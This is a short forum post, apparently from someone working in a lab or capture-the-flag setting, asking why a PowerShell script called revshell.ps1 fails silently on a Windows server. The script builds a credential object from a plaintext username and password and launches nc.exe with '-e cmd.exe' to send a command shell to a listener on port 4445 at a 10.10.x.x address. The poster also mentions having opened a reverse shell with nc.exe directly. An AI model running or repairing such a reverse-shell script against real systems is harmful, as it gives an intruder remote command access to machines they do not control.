Hello,
I’m puzzled as why this wouldn’t work on a Windows server, I have tested this locally and it works. Any hint as why it would fail silently? (Returns to prompt after executing as powershell.exe -ExecutionPolicy Bypass -File .\revshell.ps1):
$username='someUser'
$password='somePassword'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process .\nc.exe -ArgumentList '10.10.xx.xx 4445 -e cmd.exe' -Credential $credential
If I put the wrong user/pass I’ll get a powershell error. This just never sticks for some reason, and I get 0 ping back on my local 4445 listener.
nc.exe is obviously in the same directory as the script and I am executing the script from the same directory. I have used nc.exe directly to spawn a reverse shell (without using powershell) successfully as well.
Thanks,